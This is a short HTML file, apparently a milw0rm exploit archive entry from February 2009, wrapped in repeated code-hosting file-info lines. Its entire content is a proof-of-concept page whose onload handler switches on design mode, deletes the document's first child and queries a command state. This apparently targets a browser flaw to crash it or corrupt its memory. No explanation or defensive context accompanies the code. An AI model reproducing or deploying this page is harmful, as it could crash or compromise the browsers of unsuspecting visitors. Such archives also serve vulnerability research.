7 lines
172 B
HTML
Executable file
7 lines
172 B
HTML
Executable file
<BODY onload="
|
|
document.designMode='on';//string
|
|
document.removeChild(document.firstChild);//object
|
|
document.queryCommandState('BackColor');
|
|
">
|
|
|
|
# milw0rm.com [2009-02-23]
|